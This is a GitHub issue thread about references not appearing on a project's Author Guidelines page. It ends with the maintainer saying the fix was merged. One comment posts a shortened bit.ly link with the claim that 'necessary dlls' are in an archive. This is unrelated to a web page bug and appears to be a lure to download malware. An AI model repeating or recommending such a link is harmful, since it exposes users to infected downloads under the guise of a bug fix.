### ISSUE TITLE
[Bug]: References are not displayed in Author Guidelines page

### ISSUE THREAD

**Issue by GJCRESYM** [CRESYM/colib0.github.io#228]
### Is there an existing issue for this?

- [X] There are no existing issues

### Priority of this issue

- [ ] high
- [X] medium
- [ ] low

### Describe the current behaviour

Current behaviour:
![image](https://github.com/user-attachments/assets/e534e485-e08a-4f0c-9379-18660a77de1d)

References are not getting displayed

### Describe the expected behaviour

Display the expected result!

### Steps to Reproduce

1. Go to
2. Click on
3. Enter ...
# Add more steps here,

**Comment by Buqra55** [comment]
try this
https://bit.ly/4gwC82r
I put the necessary dlls in the archive

**Comment by GJCRESYM** [comment]
The issue is fixed and merged to main
